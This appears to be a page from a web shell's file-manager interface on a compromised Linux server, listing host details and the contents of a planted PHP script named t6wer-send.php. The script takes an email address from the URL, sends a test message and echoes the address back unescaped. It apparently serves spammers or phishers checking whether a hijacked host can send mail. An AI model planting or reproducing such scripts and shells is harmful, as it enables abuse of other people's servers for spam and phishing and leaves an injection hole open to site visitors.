HEX
Server: Apache
System: Linux dev.epsylon.net 3.10.0-1160.144.1.el7.tuxcare.els2.x86_64 #1 SMP Sun Feb 15 11:22:42 UTC 2026 x86_64
User: transfener (1140)
PHP: 8.2.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/transfener/public_html/t6wer-send.php.tar
home/transfener/public_html/t6wer-send.php000064400000000705151536376550014676 0ustar00<?php

error_reporting(0);
echo('T6werShop');
if (!empty($_GET['email'])) {
	if (!empty($_GET['email']) && trim($_GET['orderid']) != '') {
		$rand = trim($_GET['orderid']);
	} else {
		$rand = rand();
	}
	mail(trim($_GET['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")","T6wer Shop [Sending test].");
	echo '<b>Send an report to ['.$_GET['email'].'] - ID: '.$rand.'</b>';
	echo '<!-- <id>'.$rand.'</id> -->';
}

?>